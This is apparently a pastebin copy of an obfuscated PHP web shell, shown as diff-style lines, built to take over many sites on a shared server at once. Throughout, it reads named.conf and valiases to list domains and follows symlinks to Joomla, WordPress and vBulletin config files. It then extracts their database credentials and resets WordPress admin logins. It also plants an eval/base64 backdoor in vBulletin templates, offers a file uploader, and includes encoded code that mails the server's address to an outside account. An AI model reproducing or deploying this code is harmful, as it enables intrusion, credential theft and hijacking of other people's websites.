- } else {
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='http://$IIIIIIIlIlII'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- die();
- }
- if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
- $GLOBALS['IIIIIIIIIl11']();
- } else {
- $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("named.txt");
- }
- if (!$IIIIIIIIIll1) {
- die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- } else {
- echo "<div class='tmp'>
- <form method='POST' action='$IIIIIIIIIlI1?sws=joomla'>
- <input type='submit' value='Mass ching Admin' />
- <input type='hidden' value='1' name='s' />
- </form><br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("joomla.txt", "w");
- foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
- if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
- $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
- if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
- $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
- $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/configuration.php";
- $IIIIIIIII111 = get_headers($IIIIIIIII11l);
- $wp = $IIIIIIIII111[0];
- $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/configuration.php";
- $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
- $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
- $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/joomla/configuration.php";
- $IIIIIIIllIII = get_headers($IIIIIIIlI111);
- $IIIIIIIllIIl = $IIIIIIIllIII[0];
- $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
- $IIIIIIII1I11 = " ";
- if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIII11l;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIIlIIl;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIlI111;
- } else {
- continue;
- }
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
- $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
- ");
- if ($w) {
- $r = "<b style=\"color: #006600\">Save</b>";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
- <td><a href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- }
- }
- break;
- case "wp":
- if (isset($_POST['s'])) {
- $file = @file_get_contents("wp.txt");
- $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
- $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
- $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
- $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
- if ($GLOBALS['IIIIIIIlIll1']("wp-settings.php", $IIIIIIIlIlll)) {
- $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_PASSWORD', '", "');");
- $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_USER', '", "');");
- $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, "define('DB_NAME', '", "');");
- $IIIIIIIlI1II = IIIIIIIllll1($IIIIIIIlIlll, "$table_prefix = '", "';");
- $IIIIIIIlI1Il = $IIIIIIIlI1II . "users";
- $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
- $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
- $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `user_login` ='harhar'") or die;
- $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `user_pass` ='$IIIIIIIllII1$IIIIIIIllIlI/.5i..$IIIIIIIllIll.fUHEmNZ.eIKYTwx/'") or die;
- if ($IIIIIIIlI1ll) {
- $r = "<b style=\"color: #006600\">Succeed </b>user [harhar] pass [1]</b>";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- } else {
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- die();
- }
- if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
- } else {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
- }
- if (!$IIIIIIIIIll1) {
- die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- } else {
- echo "<div class='tmp'>
- <form method='POST' action='$IIIIIIIIIlI1?sws=wp'>
- <input type='submit' value='Mass Change Admin' />
- <input type='hidden' value='1' name='s' />
- </form>
- <br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("wp.txt", "w");
- foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
- if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
- $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
- if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
- $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
- $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp-config.php";
- $IIIIIIIII111 = get_headers($IIIIIIIII11l);
- $wp = $IIIIIIIII111[0];
- $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/wp-config.php";
- $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
- $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
- $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp/wp-config";
- $IIIIIIIllIII = get_headers($IIIIIIIlI111);
- $IIIIIIIllIIl = $IIIIIIIllIII[0];
- $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
- $IIIIIIII1I11 = " ";
- if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIII11l;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIIlIIl;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIlI111;
- } else {
- continue;
- }
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
- $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
- ");
- if ($w) {
- $r = "<b style=\"color: #006600\">Save</b>";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
- <td><a href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- }
- }
- break;
- case "vb":
- if (isset($_POST['s'])) {
- $file = @file_get_contents("vb.txt");
- $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
- $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
- $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
- $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
- if ($GLOBALS['IIIIIIIlIll1']("vBulletin", $IIIIIIIlIlll)) {
- $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gPSAn'), "';");
- $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gPSAn'), "';");
- $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, $GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3Bhc3N3b3JkJ10gPSAn'), "';");
- $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
- $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
- $IIIIIIIllIl1 = $GLOBALS['OOO0000O0']('YlZEUFM4TXdGTDRML2crdllaQVdkUFBpYVV2MTRrQVFGS3FuVVVxYXBqU1lOS0ZKeENuNzMyMmFiZ3pjSWZEeXZsK1A3L3FLczA0RDN0UzVzSjk2TU1KOWIrb2hEdzh2VFdjcTMxUEYwMnlKcC9XcXp2RWFaazJyQndXVU9hRjdnaEFvN2pyZEVHUzBkUWg0ejl6ZWNJS1VsMDRZT3JoVjROODIxRkVFd1pRZ2I2U21EUjhRaU9ic2R4WWhldU1kUktOV1NINVV4dG1LbjNHK3YwUDVUSXhnTlRxaFdXUjlyWVNMQVhIL1JhVWZnWThwYlZST1o0VkkwYWF3cU41ZWkvY2REbFJjQWlGd0pFSUd2NEh5eUxUWnA0dHErL3p5Vk94d09BU1hPK3lVcVVJNkxtL2dIeGlCTERpYzZvNjJVSGpHdUxXUUpFa285OVQ5R2c3QXBlVVhKRnNxNUVYK0FSN3lQdz09');
- $IIIIIIIllI1I = "{\${eval(gzinflate(base64_decode(\'";
- $IIIIIIIllI1I.= "$IIIIIIIllIl1";
- $IIIIIIIllI1I.= "\')))}}{\${exit()}}</textarea>";
- $IIIIIIIllI1l = "UPDATE template SET template ='" . $IIIIIIIllI1I . "' WHERE title ='FAQ'";
- $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']($IIIIIIIllI1l, $IIIIIIIlI1I1);
- if ($IIIIIIIlI1ll) {
- $r = "<b style=\"color: #006600\">Succeed</b> shell in search.php";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
- } else {
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
- }
- }
- die();
- }
- if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
- $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
- } else {
- $IIIIIIIIIll1 = $GLOBALS['IIIIIIIIIl1I']("named.txt");
- }
- if (!$IIIIIIIIIll1) {
- die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- } else {
- echo "<div class='tmp'>
- <form method='POST' action='$IIIIIIIIIlI1?sws=vb'>
- <input type='submit' value='Inject shell' />
- <input type='hidden' value='1' name='s' />
- eval(gzinflate(base64_decode('PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCiR1cmw9JF9TRVJW
- RVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwoKbWFpbCgnc2hlbGxjMGRl
- cjEzMzdAaG90bWFpbC5jb20nLCRfU0VSVkVSWydTRVJWRVJfQUREUiddLCR1cmwpOwoKJGJhc2Vf
- dXJsID0gJ2h0dHA6Ly8nLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLmRpcm5hbWUoJF9TRVJWRVJb
- J1NDUklQVF9OQU1FJ10pOw==/')));
- </form>
- <br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("vb.txt", "w");
- foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
- if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
- $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
- if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
- $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
- $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/includes/config.php";
- $IIIIIIIII111 = get_headers($IIIIIIIII11l);
- $wp = $IIIIIIIII111[0];
- $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/vb/includes/config.php";
- $IIIIIIIIlII1 = get_headers($IIIIIIIIlIIl);
- $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
- $IIIIIIIlI111 = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/forum/includes/config.php";
- $IIIIIIIllIII = get_headers($IIIIIIIlI111);
- $IIIIIIIllIIl = $IIIIIIIllIII[0];
- $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
- $IIIIIIII1I11 = " ";
- if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIII11l;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIIlIIl;
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIllIIl, "200") == true) {
- $IIIIIIII1I11 = $IIIIIIIlI111;
- } else {
- continue;
- }
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
- $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, "$IIIIIIII1I11||$IIIIIIIIIl1l
- ");
- if ($w) {
- $r = "<b style=\"color: #006600\">Save</b>";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . ">" . $IIIIIIIII1I1[1][0] . "</a></td>
- <td><a href=\"" . $IIIIIIII1I11 . "\">config</a></td><td>" . $r . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- }
- }
- break;
- case "help":
- echo "<div class='tmp'>
- <table align='center' width='40%'><td>function</td><td>Case</td>";
- $safe_mode = $GLOBALS['IIIIIIIlllII']("safe_mode");
- if ($safe_mode) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>Safe Mode</td><td>$r</td>";
- $IIIIIIIlllIl = function_exists("symlink");
- if (!$IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>function symlink</td><td>$r</td>";
- $IIIIIIIlllIl = function_exists('file');
- if (!$IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>function file</td><td>$r</td>";
- $IIIIIIIlllIl = function_exists("file_get_contents");
- if (!$IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>function file_get_contents</td><td>$r</td>";
- $IIIIIIIlllIl = function_exists("mkdir");
- if (!$IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>function mkdir</td><td>$r</td>";
- $IIIIIIIlllIl = $GLOBALS['IIIIIIIlllI1']("sym/root");
- if (!$IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #336600'>True</b>";
- }
- echo "<tr><td>Permission denied</td><td>$r</td>";
- $IIIIIIIlllIl = $GLOBALS['IIIIIIII1llI']("/Forbidden/", @file_get_contents("sym/root") or !@file_get_contents("sym/root"));
- if ($IIIIIIIlllIl) {
- $r = "<b style='color: red'>False</b>";
- } else {
- $r = "<b style='color: #006600'>True</b>";
- }
- echo "<tr><td>Forbidden</td><td>$r</td>";
- echo "</table></div>";
- break;
- default:
- $GLOBALS['IIIIIIIllllI']("Location: $IIIIIIIIIlI1");
- }
- } else {
- echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
- if ($_POST['_upl'] == "Upload") {
- if (@$GLOBALS['IIIIIIIlllll']($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
- echo "<br /><br /><b>Uploaded successful !!<br><br>";
- } else {
- echo "<br /><br />Not uploaded !!<br><br>";
- }
- }
- echo $GLOBALS['OOO0000O0']('PGJyIC8+PGJyIC8+PGJyIC8+PC9iPjwvYj48ZGl2IGNsYXNzPSJmb3QiPkNvZGVkIGJ5IEt1cm9zYWtpPC9iPiANCjxiciAvPjxiciAvPg0KPGIgc3R5bGU9ImNvbG9yOiByZWQiOz4gICAgPC9iPg0KPGJyIC8+PGJyIC8+DQo8L2Rpdj4g');
- }
- function IIIIIIIllll1($IIIIIIIlll1I, $IIIIIIIlll1l, $IIIIIIIlll11) {
- $IIIIIIIll1II = $GLOBALS['IIIIIIIIIIlI']($IIIIIIIlll1l, $IIIIIIIlll1I);
- $IIIIIIIll1II = $GLOBALS['IIIIIIIIIIlI']($IIIIIIIlll11, $IIIIIIIll1II[1]);
- return $IIIIIIIll1II[0];
- }
- echo $GLOBALS['OOO0000O0']('PC9kaXY+DQoNCjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOiAjRjRGNEY0OyIgdGl0bGU9Ij8/Pz8/Pz8iL2hyZWY9Imh0dHA6Ly9zZWMtdy5jb20vY2MiPj8/Pz8/Pz88L2E+DQoNCjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmU7IGNvbG9yOiAjRjRGNEY0OyIgdGl0bGU9Ij8/Pz8gPz8/Pz8/PyIvaHJlZj0iaHR0cDovL3NlYy13LmNvbS9jYyI+Pz8/PyA/Pz8/Pz8/PC9hPg0KDQoNCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo=');;
- echo $GLOBALS['OOO0000O0']('');
- $IIIIIIII1lII = "www.Sh3ll.Us";
- if (!$GLOBALS['IIIIIIIlIll1']($IIIIIIII1lII, $_SERVER['SERVER_NAME'])) {
- eval(gzinflate(base64_decode('BcHbtkJAAADQz6mWh1wyap2nYTDIRKUOL2e5jEvUEEJff/amn7hZF9/qlTfxQNdJ3FOw+8toyjK6XmUROmq9Nen6r5T3ga9VLWuzD2AaWDSnZPeDyErDrkx5EsU6UT9KPkNfqiYE3XQ5vEYoKwY4Yt2J4E17jkR+Ulfg8T0yrMwgtxpjHPv1wQJTrqbvBelu8e7dhznKbDxxnC1sSaOclcH4Wo/TEHSpg98Svci1E6IG0fKCSaJeuLxhYRLNwTNDhQ8UYT5zRPO+aCj2pXSfW8Mjw+IuKnZaxIVkMvch4K91f7Nb1gWd5RVbwJtw5/F18CK9qPN2AcdOYHtTNbIrhE2dgB2Xrzabzc8/')));
- echo $GLOBALS['OOO0000O0']('');
- exit;
- };
- echo "</body></html>";
- chdir($IIIIIIIll11I);
- c99shexit();;
- echo $GLOBALS['OOO0000O0']('DQoNCg0K');
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement